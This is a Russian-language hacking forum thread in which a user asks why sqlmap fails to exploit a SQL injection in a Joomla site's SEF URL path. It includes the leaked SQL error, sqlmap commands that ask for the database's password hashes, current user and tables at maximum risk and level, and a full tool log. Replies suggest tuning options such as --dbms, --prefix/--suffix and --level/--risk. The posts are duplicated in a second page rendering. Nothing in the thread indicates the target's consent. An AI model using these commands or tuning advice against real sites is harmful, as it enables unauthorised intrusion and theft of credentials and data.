SQLmap не может заюзать уязвимость хотя уязвимость есть

alexander-adv · 02.07.2014, 23:14

SQLmap не может заюзать уязвимость хотя уязвимость есть

test url: domain/ru/s1/'
пишет ошибку "No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ru/s1/'/')) AND (`origurl` != '') ORDER BY `priority` LIMIT 1' at line 1 SQL=SELECT * FROM jos_sefurls WHERE ((`sefurl` = 'ru/s1/'') OR (`sefurl` = 'ru/s1/'/')) AND (`origurl` != '') ORDER BY `priority` LIMIT 1"

Команда к sqlmap
python sqlmap.py -u "domain/ru/s1/'*" -f --random-agent --banner --current-user --passwords --tables --exclude-sysdbs --risk=3 --level=5

sql map выдает "heuristic (basic) test shows that URI parameter '#1*' might be injectable"

но в итоге ничего не может сломать.

Подскажите, в чем здесь проблема ?

Levkin · 03.07.2014, 08:18

Код HTML:

python sqlmap.py --url="domain/ru/s1/*" --dbms="MySQL"

будет достаточно.

alexander-adv · 03.07.2014, 10:09

Не, не может найти эксплоит.

Логи SQLMap.

"python sqlmap.py --url="http://domain/ru/s1/*" --dbms="MySQL"

sqlmap/1.0-dev-4e909a2 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:05:52

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[11:06:00] [INFO] testing connection to the target URL
[11:06:00] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
[11:06:02] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:06:03] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[11:06:05] [CRITICAL] can't check dynamic content because of lack of page content
[11:06:05] [INFO] testing if URI parameter '#1*' is dynamic
[11:06:05] [INFO] confirming that URI parameter '#1*' is dynamic
[11:06:06] [WARNING] URI parameter '#1*' does not appear dynamic
[11:06:06] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable
[11:06:06] [INFO] testing for SQL injection on URI parameter '#1*'
[11:06:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:06:07] [WARNING] reflective value(s) found and filtering out
[11:06:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:06:09] [INFO] testing 'MySQL inline queries'
[11:06:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:06:09] [WARNING] time-based comparison requires larger statistical model, please wait.......
[11:06:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:06:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:06:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:06:34] [WARNING] URI parameter '#1*' is not injectable
[11:06:34] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
[11:06:34] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 175 times
"

Faaax · 03.07.2014, 19:38

в sqlmap так же есть ещё --prefix и --suffix
почитайте про них.

NameSpace · 06.07.2014, 11:14

Не использовал SQLmap — он никогда не отвечал поставленным задачам. Правда, проще будет раскрутить все «по старинке», как советует Ereeee, не настраивая днями инструмент, но этот скрипт бы я не посоветовал: здесь не реализован ни keep-alive, ни gzip, перебор идет чрез LIMIT — скорость маленькая, зато нагрузка на ФС — сумасшедшая.

4395 · 10.07.2014, 17:26

Цитата:

Сообщение от NameSpace

Не использовал SQLmap — он никогда не отвечал поставленным задачам. Правда, проще будет раскрутить все «по старинке», как советует Ereeee, не настраивая днями инструмент, но этот скрипт бы я не посоветовал: здесь не реализован ни keep-alive, ни gzip, перебор идет чрез LIMIT — скорость маленькая, зато нагрузка на ФС — сумасшедшая.

Какие сканеры sql посоветуете ?

4395 · 10.07.2014, 17:34

Цитата:

Сообщение от Faaax

в sqlmap так же есть ещё --prefix и --suffix
почитайте про них.

А как их можно заюзать в этом контексте ?

ncroot · 26.09.2014, 10:39

не забывайте и про --level и --risk

03.07.2014, 08:18	#2
Levkin Регистрация: 07.02.2014 Сообщений: 8 Репутация: 0	Код HTML: python sqlmap.py --url="domain/ru/s1/*" --dbms="MySQL" будет достаточно.

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

02.07.2014, 23:14	#1
alexander-adv Регистрация: 02.07.2014 Сообщений: 2 Репутация: 0	SQLmap не может заюзать уязвимость хотя уязвимость есть SQLmap не может заюзать уязвимость хотя уязвимость есть test url: domain/ru/s1/' пишет ошибку "No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ru/s1/'/')) AND (`origurl` != '') ORDER BY `priority` LIMIT 1' at line 1 SQL=SELECT * FROM jos_sefurls WHERE ((`sefurl` = 'ru/s1/'') OR (`sefurl` = 'ru/s1/'/')) AND (`origurl` != '') ORDER BY `priority` LIMIT 1" Команда к sqlmap python sqlmap.py -u "domain/ru/s1/'" -f --random-agent --banner --current-user --passwords --tables --exclude-sysdbs --risk=3 --level=5 sql map выдает "heuristic (basic) test shows that URI parameter '#1' might be injectable" но в итоге ничего не может сломать. Подскажите, в чем здесь проблема ?

03.07.2014, 10:09	#3
alexander-adv Регистрация: 02.07.2014 Сообщений: 2 Репутация: 0	Не, не может найти эксплоит. Логи SQLMap. "python sqlmap.py --url="http://domain/ru/s1/" --dbms="MySQL" sqlmap/1.0-dev-4e909a2 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [] starting at 11:05:52 custom injection marking character ('') found in option '-u'. Do you want to process it? [Y/n/q] Y [11:06:00] [INFO] testing connection to the target URL [11:06:00] [CRITICAL] page not found (404) it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n [11:06:02] [INFO] testing if the target URL is stable. This can take a couple of seconds [11:06:03] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C [11:06:05] [CRITICAL] can't check dynamic content because of lack of page content [11:06:05] [INFO] testing if URI parameter '#1' is dynamic [11:06:05] [INFO] confirming that URI parameter '#1' is dynamic [11:06:06] [WARNING] URI parameter '#1' does not appear dynamic [11:06:06] [INFO] heuristic (basic) test shows that URI parameter '#1' might be injectable [11:06:06] [INFO] testing for SQL injection on URI parameter '#1' [11:06:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [11:06:07] [WARNING] reflective value(s) found and filtering out [11:06:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [11:06:09] [INFO] testing 'MySQL inline queries' [11:06:09] [INFO] testing 'MySQL > 5.0.11 stacked queries' [11:06:09] [WARNING] time-based comparison requires larger statistical model, please wait....... [11:06:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [11:06:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [11:06:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [11:06:34] [WARNING] URI parameter '#1*' is not injectable [11:06:34] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') [11:06:34] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 175 times "

03.07.2014, 19:38	#4
Faaax Регистрация: 03.04.2012 Сообщений: 95 Репутация: 6	в sqlmap так же есть ещё --prefix и --suffix почитайте про них.

06.07.2014, 11:14	#5
NameSpace Регистрация: 21.12.2012 Сообщений: 146 Репутация: 52	Не использовал SQLmap — он никогда не отвечал поставленным задачам. Правда, проще будет раскрутить все «по старинке», как советует Ereeee, не настраивая днями инструмент, но этот скрипт бы я не посоветовал: здесь не реализован ни keep-alive, ни gzip, перебор идет чрез LIMIT — скорость маленькая, зато нагрузка на ФС — сумасшедшая.

26.09.2014, 10:39	#8
ncroot Регистрация: 19.02.2014 Сообщений: 8 Репутация: -1	не забывайте и про --level и --risk